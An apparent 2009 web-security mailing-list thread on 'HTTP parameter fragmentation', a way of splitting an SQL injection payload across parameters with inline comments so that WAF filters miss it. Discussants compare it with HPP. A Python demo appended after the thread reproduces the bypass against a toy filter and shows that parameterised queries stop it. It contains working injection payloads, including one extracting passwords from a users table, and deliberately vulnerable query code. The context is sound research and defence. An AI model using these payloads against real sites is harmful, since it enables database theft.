[WEB SECURITY] HTTP parameters fragmentation

Steve Pinkham steve.pinkham at gmail.com
Wed Aug 19 16:30:21 EDT 2009


I agree. If it's two different parameters, it's not quite the same as 
HPP.  Somehow glanced over that detail ;-) On the other hand, some of 
the effects of HPP are similar to what you describe.

It's not really a novel technique, I've used it in the past to get 
around XSS filters,  but I'm at a loss for a definitive place to point 
for documentation on the issue.
Anyone?

Steve
lavakumar kuppan wrote:
> Not really.
> When multiple parameters of the same name are sent in a single request, 
> different web technologies (ASP, ASP.NET, Java, Python, Perl, PHP etc.) 
> handle it differently.
> This is a problem with the implementation of the HTTP protocol on these 
> technologies. This is what HPP deals with.
> 
> And when it comes to WAF bypass with HPP, the problem is the failure of 
> WAF to mimic the server technology's HTTP implementation, causing 
> an impedance mismatch.
> 
> 
> Dmitriy's method does not exploit impedance mismatch or weakness of the 
> HTTP implementation.
> Instead it is a clever way to exploit a specific type of SQL injection 
> vulnerability(involving two vulnerable parameters in the same query) by 
> splitting the payload so that it cannot be filtered by the WAF but can 
> still be executed by the server.
> 
> Though superficially the two techniques appear to be similar, they are 
> exploiting weaknesses in two different areas.
> The use of inline comments to join the parts of the payload is what is 
> common here.
> 
> This would classify as payload obfuscation IMHO
> 
> Cheers,
> Lava
> http://www.lavakumar.com
> 
> On Thu, Aug 20, 2009 at 12:29 AM, Prasad Shenoy <prasad.shenoy at gmail.com> wrote:
> 
>     Steve Pinkham nailed it I guess. It is a form of HPP? No?
>      
>     P. N. Shenoy
> 
>     On Wed, Aug 19, 2009 at 1:02 PM, lavakumar kuppan <lavakumar.in@gmail.com> wrote:
> 
>         Hi Dmitriy,
> 
>         That is very interesting. It very closely resembles the
>         ModSecurity Filter Bypass that I had discovered some time back.
>         There is just one small difference: I was using the same
>         parameter multiple times (HTTP Parameter Pollution) while you are
>         using multiple parameters, nice trick!
> 
>         I had written a whitepaper on the same, you can find it at
>         http://lavakumar.com/Split_and_Join.pdf
>         The ModSecurity advisory is at
>         http://lavakumar.com/modsecurity_hpp.txt
> 
>         You can find more information about HPP
>         at http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
> 
>         Hope this helps.
> 
>         Cheers,
>         Lava
>         http://www.lavakumar.com
> 
> 
>         2009/8/19 Dmitriy Evteev <devteev at ptsecurity.com>:
> 
>          > While preparing an article about WAF bypassing methods, I found an
>          > interesting way to bypass filters via HTTP parameter fragmentation.
>          >
>          > Vulnerable code example:
>          >
>          > Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
>          >
>          > The following request does not allow an attack to be carried out:
>          >
>          > index.php?a=1+union+select+1,2/*
>          >
>          > The following request succeeds using HPF:
>          >
>          > index.php?a=1+union/*&b=*/select+1,2
>          >
>          > In this case the SQL query looks like:
>          >
>          > select * from table where a=1 union/* and b=*/select 1,2
>          >
>          > Another example:
>          >
>          > Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit ".$_GET['c']);
>          >
>          > Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." order by ".$_GET['c']." limit 1");
>          >
>          > Using HPF (HTTP Parameter Fragmentation), the request succeeds:
>          >
>          > index.php?a=1+union/*&b=*/select+1,2,pass/*&c=*/from+users--
>          >
>          > The question is: is there any name for this technique? Please advise me if
>          > you know articles or experts in the field (for example, I found a reference in
>          > http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf,
>          > page 79).
>          >
>          > Thank you for your help and cooperation in advance!
>          >
>          > - - - - - - - - - - - - - - -
>          > Best Regards, Dmitry Evteev
>          > Positive Technologies Co.
>          > Tel.: (495) 744-0144
>          > Web: http://www.ptsecurity.ru
> 
> 
> 


-- 
  | Steven E. Pinkham                      |
  | Security Researcher, Maven Security    |
  | steve.pinkham at mavensecurity.com        |
  | GPG public key ID CD31CAFB             |
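The bypass Dmitriy describes in the quoted post, reduced to something runnable. This is an added illustration and not code from anyone in this thread: the concatenating query from the post is translated to Python, a hypothetical per-parameter regex stands in for the WAF rule, and a constructed two-row SQLite table plays the back end. It shows why neither fragment trips a filter that looks at one value at a time, why the concatenated string still parses as a UNION (the comment swallows " and b="), and that the same two values bound as query parameters match nothing. The table is called "items" rather than "table" only because "table" is reserved.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Hypothetical per-parameter WAF rule (constructed for this example). It
# inspects each decoded value on its own, which is the gap HPF slips through.
UNION_SELECT = re.compile(r"union\s+(all\s+)?select", re.IGNORECASE)


def parse_request(url):
    """Decode a GET request into {name: value}.

    Only the first value of each name is kept. HPF spreads the payload over
    *different* names, so how repeated names are handled does not matter here.
    """
    query = urlsplit(url).query
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def waf_blocks(params):
    """Naive WAF: true if any single parameter value contains UNION ... SELECT."""
    return any(UNION_SELECT.search(value) for value in params.values())


def build_query(params):
    """The post's vulnerable concatenation, translated from PHP:
    Query("select * from table where a=".$_GET['a']." and b=".$_GET['b'])
    """
    return "select * from items where a=" + params["a"] + " and b=" + params["b"]


def fresh_db():
    """Constructed sample data: two rows in a two-column table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table items (a integer, b integer)")
    conn.executemany("insert into items values (?, ?)", [(1, 10), (2, 20)])
    return conn


def attempt(url):
    """Model the request path: WAF first, then the concatenated query.

    Returns ("blocked", None) or ("executed", rows).
    """
    params = parse_request(url)
    if waf_blocks(params):
        return ("blocked", None)
    conn = fresh_db()
    try:
        return ("executed", conn.execute(build_query(params)).fetchall())
    finally:
        conn.close()


def safe_query(params):
    """Same lookup with bound parameters: the fragments are compared as data,
    the comment markers never reach the SQL parser, and no row matches."""
    conn = fresh_db()
    try:
        return conn.execute(
            "select * from items where a=? and b=?", (params["a"], params["b"])
        ).fetchall()
    finally:
        conn.close()


if __name__ == "__main__":
    # Whole payload in one parameter (b=1 added so the query is well-formed):
    # the per-parameter rule sees "union select" and blocks it.
    print(attempt("http://example.test/index.php?a=1+union+select+1,2/*&b=1"))
    # Fragmented: a="1 union/*", b="*/select 1,2". Neither value matches on
    # its own, but concatenation yields
    #   select * from items where a=1 union/* and b=*/select 1,2
    # and the comment hides " and b=", leaving a working UNION.
    print(attempt("http://example.test/index.php?a=1+union/*&b=*/select+1,2"))
    # The same fragments bound as parameters: nothing is injected.
    print(safe_query(parse_request(
        "http://example.test/index.php?a=1+union/*&b=*/select+1,2")))
```

The point the thread is making is visible in `waf_blocks`: a filter that normalises and inspects values one at a time cannot see a token sequence that only exists after the application has glued the values together, and, unlike HPP, no quirk of duplicate-parameter handling is involved. Binding parameters removes the concatenation, so there is nothing for the comment trick to join.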
